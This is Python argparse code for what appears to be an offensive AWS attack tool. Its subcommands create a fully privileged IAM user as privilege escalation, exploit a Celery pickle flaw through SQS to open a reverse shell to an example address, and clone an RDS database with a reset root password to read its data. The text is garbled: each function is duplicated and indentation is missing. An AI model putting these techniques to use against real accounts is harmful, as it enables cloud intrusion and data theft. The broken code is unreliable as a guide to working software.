def cmd_arguments(subparsers):
#
# dump-role-permissions subcommand help
#
_help = 'Dump the permissions for the currently configured credentials'
parser = subparsers.add_parser('dump-permissions', help=_help)
add_credential_arguments(parser)
return subparsers
def cmd_arguments(subparsers):
#
# dump-role-permissions subcommand help
#
_help = 'Dump the permissions for the currently configured credentials'
parser = subparsers.add_parser('dump-permissions', help=_help)
add_credential_arguments(parser)
return subparsers
def cmd_arguments(subparsers):
#
# create-iam-user subcommand help
#
_help = 'Use the current credentials to create a user with all AWS'\
' privileges. When the current user has iam:* but other'\
' permissions are restricted, this acts like a privilege'\
' escalation.'
parser = subparsers.add_parser('create-iam-user', help=_help)
add_credential_arguments(parser)
return subparsers
def cmd_arguments(subparsers):
#
# create-iam-user subcommand help
#
_help = 'Use the current credentials to create a user with all AWS'\
' privileges. When the current user has iam:* but other'\
' permissions are restricted, this acts like a privilege'\
' escalation.'
parser = subparsers.add_parser('create-iam-user', help=_help)
add_credential_arguments(parser)
return subparsers
def cmd_arguments(subparsers):
#
# celery-pickle-exploit subcommand help
#
_help = 'Exploit unpickle vulnerability in Celery'
parser = subparsers.add_parser('celery-pickle-exploit', help=_help)
_help = 'Run a payload that will create a reverse shell. Example:'\
' --reverse=1.2.3.4:4000'
parser.add_argument('--reverse', help=_help, required=True)
_help = 'SQS queue name where raw message will be injected.'
parser.add_argument('--queue-name', help=_help, required=True)
add_region_arguments(parser)
add_credential_arguments(parser)
return subparsers
def cmd_arguments(subparsers):
#
# celery-pickle-exploit subcommand help
#
_help = 'Exploit unpickle vulnerability in Celery'
parser = subparsers.add_parser('celery-pickle-exploit', help=_help)
_help = 'Run a payload that will create a reverse shell. Example:'\
' --reverse=1.2.3.4:4000'
parser.add_argument('--reverse', help=_help, required=True)
_help = 'SQS queue name where raw message will be injected.'
parser.add_argument('--queue-name', help=_help, required=True)
add_region_arguments(parser)
add_credential_arguments(parser)
return subparsers
def cmd_arguments(subparsers):
#
# snapshot-rds subcommand help
#
snap_help = 'Creates a snapshot of an RDS instance and restores it with a'\
' different "root" password in order to access all it\'s'\
' information.'
parser_snapshot = subparsers.add_parser('snapshot-rds', help=snap_help)
_help = 'The "root" password to use for the RDS clone.'\
'Must be 4-15 alphanumeric characters.'
parser_snapshot.add_argument('--password', help=_help, required=True)
_help = 'The RDS instance name to clone.'
parser_snapshot.add_argument('--rds-name', help=_help, required=True)
add_credential_arguments(parser_snapshot)
add_region_arguments(parser_snapshot)
return subparsers
def cmd_arguments(subparsers):
#
# snapshot-rds subcommand help
#
snap_help = 'Creates a snapshot of an RDS instance and restores it with a'\
' different "root" password in order to access all it\'s'\
' information.'
parser_snapshot = subparsers.add_parser('snapshot-rds', help=snap_help)
_help = 'The "root" password to use for the RDS clone.'\
'Must be 4-15 alphanumeric characters.'
parser_snapshot.add_argument('--password', help=_help, required=True)
_help = 'The RDS instance name to clone.'
parser_snapshot.add_argument('--rds-name', help=_help, required=True)
add_credential_arguments(parser_snapshot)
add_region_arguments(parser_snapshot)
return subparsers
